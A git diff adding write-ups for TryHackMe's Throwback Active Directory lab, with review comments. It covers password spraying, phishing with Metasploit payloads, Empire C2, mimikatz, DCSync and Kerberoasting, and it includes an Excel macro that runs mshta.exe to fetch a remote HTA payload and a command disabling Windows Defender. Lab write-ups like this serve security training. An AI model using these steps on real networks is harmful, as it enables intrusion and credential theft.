diff --git a/TryHackMe/Throwback/THROWBACK-CORP-ADT01.md b/TryHackMe/Throwback/THROWBACK-CORP-ADT01.md new file mode 100644 index 0000000..9c7803f --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-CORP-ADT01.md @@ -0,0 +1,20 @@ +# TryHackMe-THROWBACK-CORP-ADT01 (10.200.34.243) + + +We found credentials for `DaviesJ` but we won't be able to login we need to run autoroute on CORP-DC01 + + + +Open a meterpreter session on CORPORATE-ADT01 + + + + + + + + + +In `dosierk` 's documents we find a note + + diff --git a/TryHackMe/Throwback/THROWBACK-CORP-DC01.md b/TryHackMe/Throwback/THROWBACK-CORP-DC01.md new file mode 100644 index 0000000..82dfe87 --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-CORP-DC01.md @@ -0,0 +1,28 @@ +# TryHackMe-THROWBACK-CORP-01(10.200.34.118) + +We can login with MercerH's credentials as this domain is trusted by THROWBACK.LOCAL but in order to do we need to run `autoroute` on DC because we cannot reach CORP domain through PROD + + + +Here I downloaded meterpreter backdoor + + + + + +Now we have to remove route from previous sessions which in my case is `6` so I will use autoroute and `SET CMD delelte, SET SESSION 6` and then run it. After that I will `SET CMD autoadd , SET SESSION 7` and run the module + + + + + + + + + + + +Add both the domain names in /etc/hosts file + + + diff --git a/TryHackMe/Throwback/THROWBACK-CORP-MAIL.md b/TryHackMe/Throwback/THROWBACK-CORP-MAIL.md new file mode 100644 index 0000000..386ca91 --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-CORP-MAIL.md @@ -0,0 +1,16 @@ +# TryHackMe-THROWBACK-CORP-MAIL + +On searching Throwback Hacks github I found a link to there repository + + + + + + + +Seeing the commit history of the file `db_connect.php` we can find credentials + + + + + diff --git a/TryHackMe/Throwback/THROWBACK-DC01.md b/TryHackMe/Throwback/THROWBACK-DC01.md new file mode 100644 index 0000000..e278beb --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-DC01.md 
@@ -0,0 +1,64 @@ +# TryHackMe-THROWBACK-DC01(10.200.34.117) + + + +I used SSH to log on the domain controller + + + +We can see that we are a normal domain user on this machine so we need to escalate our privileges and the only way to enumerate AD is to use bloodhound so by using the same loot we got from WS-01 we are going to utilize it + +Using the query `Find Principals with DCSync Rights` + + + +Going into to the documents of jeffersd we find a notice + + + +Here there's a backup account password and we already found that `backup` has DCsync rights + +``` +DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller(DC) in order to retrieve password data via domain replication +``` + +By running secretsdump.py we dumped hashes from NTDS.dit + + + +Now we have a bunch of user hashes but the problem how we can we know which user to target as we need to escalate our privileges so running a command `net localgroup` to see available groups on AD + + + +We can see there's a group `Administrators` + + + +So we need to crack `MercerH` 's hash + + + +To crack the hash we will be using a rules in `hashcat` + + + + + +Simply ssh with the current logged in user + +`ssh MercerH@localhost` + + + +And you can see we are now a privleged user + + +``` +THROWBACK.local\MercerH:pikapikachu7 +JeffersD:Throwback2020 +``` + +Going back to bloodhound we can see that THROWBACK.LOCAL domain is trusted by CORPORATE.LOCAL + + + diff --git a/TryHackMe/Throwback/THROWBACK-FW01.md b/TryHackMe/Throwback/THROWBACK-FW01.md new file mode 100644 index 0000000..8b4f996 --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-FW01.md 
@@ -0,0 +1,102 @@ +# TryHackMe-THROWBACK-FW01(10.200.34.138) + +## NMAP + +``` +Nmap scan report for 10.200.34.138 +Host is up, received echo-reply ttl 63 (0.18s latency). +Scanned at 2021-02-20 14:40:52 PKT for 219s +Not shown: 65531 filtered ports +Reason: 65531 no-responses +PORT STATE SERVICE REASON VERSION +22/tcp open ssh syn-ack ttl 63 OpenSSH 7.5 (protocol 2.0) +| ssh-hostkey: +| 4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA) +|_ssh-rsa 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 +53/tcp open domain syn-ack ttl 63 (generic dns response: REFUSED) +80/tcp open http syn-ack ttl 63 nginx +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +|_http-title: Did not follow redirect to https://10.200.34.138/ +|_https-redirect: ERROR: Script execution failed (use -d to debug) +443/tcp open ssl/http syn-ack ttl 63 nginx +|_http-favicon: Unknown favicon MD5: 5567E9CE23E5549E0FCD7195F3882816 +| http-methods: +|_ Supported Methods: GET HEAD POST +|_http-title: pfSense - Login +| ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate +| Subject Alternative Name: DNS:pfSense-5f099cf870c18 +| Issuer: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate +| Public Key type: rsa +| Public Key bits: 2048 +| Signature Algorithm: sha256WithRSAEncryption +| Not valid before: 2020-07-11T11:05:28 +| Not valid after: 2021-08-13T11:05:28 +| MD5: fe06 fa47 4d83 8454 e67a 1840 7ea8 d101 +| SHA-1: 672e 5f8f 9b28 7cad 5789 c5be cb1c f3f2 6c63 dfb2 +|_-----END CERTIFICATE----- +``` + +### PORT 80 (HTTP) + + + +We can see that there is a login page to pfsense control panel. I decided to try default credentials + + + +These credentials logged us in + + + +When logged in we can see `Diagnostics` tab and we see menu `Command Prompt` + + + + + + + +We can see that commands will be executed as `root` + + + +Also php commands can be executed. 
I uploaded a `phpbash` which is like a backdoor having a full interactivev shell + +`https://github.com/Arrexel/phpbash` + + + + + +We can get the root flag in `/root/root.txt` + + + +We can find logs for in `/usr/local/www` + + + +And we can get this this username and hash + +`HumphreyW:1c13639dba96c7b53d26f7d00956a364` + +I search for the log flag by running recusrive find command in `/var/log` + + + + +Now the hash that we got for the user `HumphreyW` we need to crack it but we need to know what type of hash it is so I went to `Name That Hash` + + + +It gave me a bunch of hash type for it so I checked for MD5 and MD4 that was a negative + +I started `hashcat` for NTLM (1000) + + + +And it was cracked + + + diff --git a/TryHackMe/Throwback/THROWBACK-MAIL.md b/TryHackMe/Throwback/THROWBACK-MAIL.md new file mode 100644 index 0000000..2d021ec --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-MAIL.md 
@@ -0,0 +1,103 @@ +# TryHackMe-THROWBACK-MAIL (10.200.34.232 ) + +## NMAP + +``` +Nmap scan report for 10.200.34.232 +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 3b:b1:4c:b7:3f:fc:3e:ec:83:0f:0e:db:bf:25:9a:01 (RSA) +| 256 76:62:f3:eb:94:08:bc:a8:34:53:44:4d:ec:ac:87:f1 (ECDSA) +|_ 256 0b:80:aa:78:66:34:43:09:db:99:98:e1:99:7e:a8:b0 (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +| http-title: Throwback Hacks - Login +|_Requested resource was src/login.php +143/tcp open imap Dovecot imapd (Ubuntu) +|_imap-capabilities: Pre-login IDLE LOGINDISABLEDA0001 SASL-IR more capabilities have ID post-login listed OK IMAP4rev1 STARTTLS ENABLE LOGIN-REFERR +ALS LITERAL+ +| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal +| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal +| Not valid before: 2020-07-25T15:51:57 +|_Not valid after: 2030-07-23T15:51:57 +|_ssl-date: TLS randomness does not represent time +993/tcp open ssl/imap Dovecot imapd (Ubuntu) +|_imap-capabilities: Pre-login IDLE SASL-IR more capabilities have ID post-login IMAP4rev1 OK AUTH=PLAINA0001 listed ENABLE LOGIN-REFERRALS LITERAL+ +| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal +| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal +| Not valid before: 2020-07-25T15:51:57 +|_Not valid after: 2030-07-23T15:51:57 +|_ssl-date: TLS randomness does not represent time +``` + +### PORT 80 (HTTP) + + + +We can login with the guest credentials which are + +`tbhguest:WelcomeTBH1!` + + + +We can get our first flag form the inbox + + + +Going to `Addresses` tab we can see a list of usernames and emails + + + +Now intercept the login request in order to start bruteforce attack so we can use these parameters in `hyda` + + + +We have the usernames but don't have the passwords but it was 
told that some accounts might use weak credentials so I crafted some passwords + +``` +Summer2020 +Management2020 +Management2018 +Password2020 +ThrowbackHacks2020 +Throwback202 +Password123 +Winter2020 +Winter2018 +Spring2020 +Winter2019 +Summer2018 +Summer2019 +``` + + + + +``` +login: PeanutbutterM password: Summer2020 +login: DaviesJ password: Management2018 +login: GongoH password: Summer2020 +login: MurphyF password: Summer2020 +login: JeffersD password: Summer2020 +``` + +We logged in as guest again because it had the email addresses of all users and we wanted to send to everyone + + + +Generate a staged payload for catching reverse shell through metasploit + + + + + +Attatched the payload in email + + + +After sending the email I wait for some time a got a metepreter session + + + + \ No newline at end of file diff --git a/TryHackMe/Throwback/THROWBACK-PROD.md b/TryHackMe/Throwback/THROWBACK-PROD.md new file mode 100644 index 0000000..476652e --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-PROD.md 
@@ -0,0 +1,238 @@ +# TryHackMe-THROWBACK-PROD(10.200.34.219) + +## NMAP + +``` +Nmap scan report for 10.200.34.219 +Host is up (0.19s latency). +Not shown: 993 filtered ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) +| ssh-hostkey: +| 2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA) +| 256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA) +|_ 256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519) +80/tcp open http Microsoft IIS httpd 10.0 +| http-methods: +|_ Potentially risky methods: TRACE +|_http-server-header: Microsoft-IIS/10.0 +|_http-title: Throwback Hacks +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +445/tcp open microsoft-ds? +3389/tcp open ms-wbt-server Microsoft Terminal Services +| rdp-ntlm-info: +| Target_Name: THROWBACK +| NetBIOS_Domain_Name: THROWBACK +| NetBIOS_Computer_Name: THROWBACK-PROD +| DNS_Domain_Name: THROWBACK.local +| DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local +| DNS_Tree_Name: THROWBACK.local +| Product_Version: 10.0.17763 +|_ System_Time: 2021-02-22T17:08:55+00:00 +| ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local +| Not valid before: 2021-02-21T16:52:43 +|_Not valid after: 2021-08-23T16:52:43 +|_ssl-date: 2021-02-22T17:09:35+00:00; +13s from scanner time. 
+5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-server-header: Microsoft-HTTPAPI/2.0 +|_http-title: Service Unavailable +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows +Host script results: +|_clock-skew: mean: 12s, deviation: 0s, median: 12s +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2021-02-22T17:08:58 +|_ start_date: N/A + +``` + +### PORT 80 (HTTP) + + + +Since this host has AD running so we can run a tool called `responder` to start an attack called LLMNR/NBT-NS poisoning + + + + + +I ran this tool for 2 days and it didn't gave me the hash , there was a problem in Throwbacks network so I had to continue looking up the writeups + +### Remmina + +Since this windows machine has port 3389 open which is for `Remote Desktop Protocol` we can login with PetersJ's passoword which is `Throwback317` + + + + + +### Installing Starkiller + +Starkiller is C2 (Command and Control) frontend interface for "Empire" used for post exploitation without interfereing with the actual machine it self. It is used for enumeration and for identifiying privilege escalation vectors so for that we need to have `starkiller` and `empire` + + + + + + +Now we have to `chmod +x starkiller-1.3.2.AppImage` and `./starkiller-1.3.2.AppImage --no-sandbox` + + + +We will be presented with a login prompt + + + +### Installing Empire + +Empire is great tool similar to meatsploit for post exploitation and information gathering used on windows machines + +Run `git clone https://github.com/BC-SECURITY/Empire.git` + + + +Run `install.sh` + + + +This installation would take a long time. 
So going back to starkiller we log in with the credentials `empireadmin:passowrd123` and we need to make this application listen on defualt port which is `1337` leet but in order login we want empire to be running + + + + + +So our installation for empire is complete but still we need to install some dependencies + +`pip3 install poetry` and `poetry install` then `poetry run python empire` + + + +One last thing to do `pip3 install click` and when you run `powershell-empire` + + + +And it works but we need to use it with `--rest`,so + + + +By using this option it will use the default ports and will allow us to use frontend which starkiller + + + + + +On logging in with the default credentials above + + + +Now we are going to create our listener + + + +We have our listener created + + + +Now we need to create our stager which is the payload we are going to transfer on the target machine + + + + + + + + + +Click on the download or save icon to save the payload somewhere on your local machine and then start a python3 http server to host it in order to download it from the target machine + + + +The web server is running + + + +We have that on the target machine all we need to do is launch the payload + +On launching we will see some information regarding the target machine in the `agents` section + + + +We can see that starkiller is acting like C2 server which sends commands on the target machine and we can see the output over the GUI + + + +Run `seatbelt` module + + + + + +This module did enumeration for us a found a user with a saved credential + + + + + +Now we have logged in as `admin-petersj` in order to dig deep we have to run mimikatz but for that we need to create another listener and stager in order to run c2 commands as elevated user + + + + + + + +On running this payload again + + + +Now we need to run `mimikatz` module through our C2 + + + +Running `privilege::debug` will give us a status `OK` means we can escalate our privileges to NT-AUTHORITY + + + + + 
+We ran the command and notice if scroll down a little be we can see the password hashes of the users + + + +There's a feature in Starkiller which can save all the credentials or hashes found in a neat way + + + +Now we have the credentials but don't know on which host these credentials are valid so we are going to something called` Pass The Hash` a realy attack for that we need to run `proxychains` or `autoroute` for that we need to have meterepreter session + + + + + + + + + + + +Install `Crackmapexec` + +https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation#binaries + + + +We can see that we can ping the ohter machines as well so the task says that the hash from task 10 will work which was from `HumprehyW` 's hash and the other from the list of credentials we dumped using mimikatz + + + + + + +PetersJ:Throwback317 + +runas /savecred /user: /profile "cmd.exe" + +use auxiliary/server/socks4a \ No newline at end of file diff --git a/TryHackMe/Throwback/THROWBACK-SEC-BREACH.md b/TryHackMe/Throwback/THROWBACK-SEC-BREACH.md new file mode 100644 index 0000000..f2b34e5 --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-SEC-BREACH.md 
@@ -0,0 +1,41 @@ +# TryHackMe-THROWBACK-SEC-BREACH + +Now we need to run this tool `LeetLinked` + + + +This returned as a list of emails + + + +But we need to convert the format which found from a note in dosierk's documents. So we will be using `namely` to generate emails in a proper format using names we found from `leetlinked` + + + + + +Now this in HRE format but there are other formats as well + + + + + +In this I generated a list of potential emails now only thing left for us to do is to visit `breachgtfo.local` and check for breached emails + + + +We can use `wfuzz` to check for response length + + + +We get the same amount of Characters so we can hide `4950` and see if there are characters with a length other than that + + + +And we have found a request with different characters + + + +Now if we try to login on thier corporate mail + +s \ No newline at end of file diff --git a/TryHackMe/Throwback/THROWBACK-TBSEC-DC01.md b/TryHackMe/Throwback/THROWBACK-TBSEC-DC01.md new file mode 100644 index 0000000..f51ab87 --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-TBSEC-DC01.md @@ -0,0 +1,55 @@ +# TryHackMe-THROWBACK-TBSEC-DC01 + +We have the credentials from the email + +`TBSEC_GUEST:WelcomeTBSEC1!` + +But in order to login I tried using `win-rm` and `ssh` both failed then I tried with RDP and got access + + + + + +Run `powershell-empire --rest` and `starkiller` + + + + + +We have our listener ready + + + +For setting a stager + + + + + +Now we need to deliver this bat file to target + + + + + + + +Run the built in rubeus from starkiller + + + + + +You can easily transfer the file by simpling clicking Download icon + + + + + +On running hashcat we will crack the hash + + + +We can now login through RDP with that account + + diff --git a/TryHackMe/Throwback/THROWBACK-TIME.md b/TryHackMe/Throwback/THROWBACK-TIME.md new file mode 100644 index 0000000..3d57c3c --- /dev/null +++ b/TryHackMe/Throwback/THROWBACK-TIME.md 
@@ -0,0 +1,112 @@ +# TryHackMe-THROWBACK-TIME(100.20.34.176) + +Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine + + + +So we can access the web page + + + +Going back to MAIL machine to get reset link by logging in as `MurhphyF` + + + + + +murphyf +PASSWORD + +Now we need to update our `/etc/hosts` file + + + +We updated the password through the reset link and can login with those + + + +Create a microsoft execl macro document having this macro in it using metasploit hta server + + + +``` +Sub HelloWorld() + PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta") +End Sub + +Sub Auto_Open() + HelloWorld +End Sub +``` + +Where that .hta is generated through metasploit + + + +Upload that document + + + +You will get a shell + + + + + +By typing `sysinfo` + + + +We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command `ps` to check currently running processes + + + +Here we need to identify the process which is running as `NT AUTHORITY\SYSTEM` also running as a 64 bit + + + +So we see this statisfying our requirements + + + +And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture + + + +We can now run commands like mimikatz , hashdump + + + +We have successfully dumped the hashes of the accounts on this machine + + + +Using proxychains we ssh with `Timekeeper's` credentials + + + +Switch to directory where mysql.exe is + + + +Using the password from the kerberoasted mysql service account + + + + + + + + + + + +Save the list of usernames you found from `domain_users` database + + + +We can utilize the same list of passwords we used to get access to Throwbacks mail + + + + \ No newline at end of file diff --git a/TryHackMe/Throwback/THROWBACK-WS01.md b/TryHackMe/Throwback/THROWBACK-WS01.md new file mode 100644 index 0000000..a4cbd57 --- /dev/null 
+++ b/TryHackMe/Throwback/THROWBACK-WS01.md 
@@ -0,0 +1,103 @@ +# TryHackMe-THROWBACK-WS01 (10.200.34.222) + +## NMAP + +``` +No ports open on this machine +``` + +We can get `user.txt` flag from here + + + +And for `root.txt` + + + +Since we have ran `autoroute` on `THROWBACK-WS01` we can access machines on the network as we were not able to run nmap scan on this machine + + + + + +We can ssh into the machine with BlaireJ's plain text password + + + +Now that we have gained inital foothold on WS-01 again we need to do some enumeration with `Bloodhound`. + +After installing it on kali machine we can the GUI interface on browser + + + + + +Now we need to download a file called `Sharphound.ps1` a powershell script to be transfered on WS-01 machine + +https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 + +To run the script we need to disable antivirus or windows defender on the target machine + +https://www.itechtics.com/enable-disable-windows-defender/ + +`Set-MpPreference -DisableRealtimeMonitoring $true` + + + +Then run this command to get a map of the AD environment + +`Invoke-Bloodhound -CollectionMethod All -Domain THROWBACK.local -ZipFileName loot.zip` + + + + + +Now we need to get this `20210227114234_loot.zip` on our machine + +I messed up with the credentials and didn't found a way to reset so I disabled the authentication + +`subl /etc/neo4j/neo4j.conf` + + + + + +Copy that zip file from the target to our local machine + + + +Simply drag and drop to bloodhound GUI and run quries example get all admins + + + +Run the query `Map Domain Trusts` + + + + +Run the query `List all Kerberoastable Accounts` + + + + +Run the query `Find Shortest Paths to Domain Admins` + + + +Now in order to get kerbroast ticket we need the impacket version 0.9.19 + +https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19 + +Reason is if we run with latest version + + + +We won't get the kerbroast ticket of SQLSERVICE account so on running with older version + + + +On getting that 
kerbroast hash we need to crack it using `hashcat` + + + +
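Review bot: In THROWBACK-CORP-ADT01.md the note found in `dosierk`'s documents is never recorded, yet THROWBACK-SEC-BREACH.md later relies on it ("the format which found from a note in dosierk's documents"); quote or summarise the note's content here so the chain of evidence survives without the missing screenshots (every blank block in the file reads as an image that was not committed). The heading also calls the host `THROWBACK-CORP-ADT01` while the body says `CORPORATE-ADT01`; pick one name.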
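Review bot: In THROWBACK-CORP-DC01.md the autoroute step contains a typo in the quoted command, `SET CMD delelte` should be `SET CMD delete`, and the session numbers `6` and `7` are specific to the author's run; say that readers must substitute their own session ids (`sessions -l` in msfconsole lists them) rather than copying those values. The heading `TryHackMe-THROWBACK-CORP-01` does not match the file name `THROWBACK-CORP-DC01.md`, and "Add both the domain names in /etc/hosts file" should list the exact hostnames and the IP each maps to, since later files (for example `breachgtfo.local` in THROWBACK-SEC-BREACH.md) depend on those entries.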
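Review bot: In THROWBACK-CORP-MAIL.md the key finding is under-documented: state which commit of `db_connect.php` contained the credentials and whether the current version of the file still does, because the lesson worth writing down is that a secret deleted from a file remains recoverable from git history until the history is rewritten and the credential is rotated. Also "there repository" should read "their repository".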
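Review bot: In THROWBACK-DC01.md the explanation of `net localgroup` as a way "to see available groups on AD" is imprecise: `net localgroup` lists the local and built-in groups of the host it runs on, and it only surfaces the domain's Builtin `Administrators` group here because the shell is on the domain controller itself; `net group /domain` is the command that enumerates domain groups from any joined host, so say which one you mean and why it worked on this box. Two smaller points: the DCSync definition is a quotation and belongs in a `>` blockquote rather than a code fence, and "Simply ssh with the current logged in user" contradicts the command under it, `ssh MercerH@localhost`, which logs in as the newly cracked account, not the current one ("privleged" is also a typo).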
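Review bot: In THROWBACK-FW01.md the hash-identification paragraph should explain why MD5 and MD4 "was a negative" while NTLM (mode 1000) cracked the same value: an NT hash is MD4 computed over the UTF-16LE encoding of the password, so hashcat's raw MD4 mode hashes the candidates as plain bytes and never matches, while mode 1000 applies the encoding first. The sentence "We can find logs for in `/usr/local/www`" is missing its object (logs for what?), and "interactivev" and "recusrive" are typos.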
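Review bot: In THROWBACK-MAIL.md the hydra results block has no command above it, so the reader cannot tell which wordlist, user list or intercepted parameters produced the five `login: ... password: ...` lines; record the invocation alongside the results. In the password list, `Throwback202` looks truncated next to the other `...2020` entries, so confirm it is intentional. The results themselves are worth one sentence of commentary: five of the listed accounts share `Summer2020`, which is exactly the seasonal weak-password pattern the task hinted at. Typos: "hyda" (hydra), "form the inbox", "Attatched", "metepreter".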
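Review bot: In THROWBACK-PROD.md the file ends with three unlabelled scratch lines, `PetersJ:Throwback317`, `runas /savecred /user: /profile "cmd.exe"` and `use auxiliary/server/socks4a`; the `runas` line has an empty `/user:` argument and none of the three is tied to a step, so either fold them into the sections where they were used (the saved-credential finding from `seatbelt`, and the proxy setup for the `Pass The Hash` section) with the account name filled in, or remove them. The Starkiller login `empireadmin:passowrd123` reads like a typo of Empire's default `password123` and will trip anyone who copies it, `HumprehyW` conflicts with `HumphreyW` in THROWBACK-FW01.md, and "a realy attack" should not become "relay attack" since pass-the-hash is not a relay technique; reword to say what was meant.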
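Review bot: In THROWBACK-SEC-BREACH.md the file is cut off: the last section stops at "Now if we try to login on thier corporate mail" followed by a stray `s`, so the outcome is never stated (THROWBACK-TBSEC-DC01.md opens with credentials "from the email", which suggests this is where that login result belongs). "HRE format" is an unexplained abbreviation; spell out the email format that the `dosierk` note described. For the wfuzz step, "hide `4950`" should name the option used (`--hh 4950` hides responses by character count) so the filtering is reproducible.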
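Review bot: In THROWBACK-TBSEC-DC01.md the Rubeus and hashcat steps omit the facts a reader needs to reproduce them: which Rubeus action was run, which account's hash it produced, what hash format it was and which hashcat mode cracked it; the closing line "We can now login through RDP with that account" also never names the account. "win-rm" should be written "WinRM" (or the tool name if one was used) and "simpling" should be "simply".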
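Review bot: In THROWBACK-TIME.md the heading IP `100.20.34.176` does not match the `10.200.34.x` range used by every other host in this set; check whether it should be `10.200.34.176`. `MurhphyF` here conflicts with `MurphyF` in THROWBACK-MAIL.md, and the two bare lines `murphyf` / `PASSWORD` read as leftover scratch; either label them as the reset credentials or drop them. If you add a detection aside anywhere in the set, the macro shown in this file is the place: Excel spawning `mshta.exe` with a remote URL is the observable it produces. Typos: "execl", "merterpreter", "statisfying", "meterpeter".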
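Review bot: In THROWBACK-WS01.md the sentence "Since we have ran `autoroute` on `THROWBACK-WS01` we can access machines on the network as we were not able to run nmap scan on this machine" is circular: a route is added through an already-compromised session to reach WS01, and the NMAP block just above shows WS01 could not be scanned directly, so state which session the route was added through (THROWBACK-PROD.md suggests the PROD meterpreter session) and what it gave access to. The neo4j step "I disabled the authentication" should name the setting changed in `/etc/neo4j/neo4j.conf` (`dbms.security.auth_enabled=false`) and note that neo4j stays bound to localhost when auth is off. The impacket 0.9.19 requirement is asserted but not explained; say what the newer version does differently for the SQLSERVICE account. Typos: "quries", "inital", "transfered", "kerbroast".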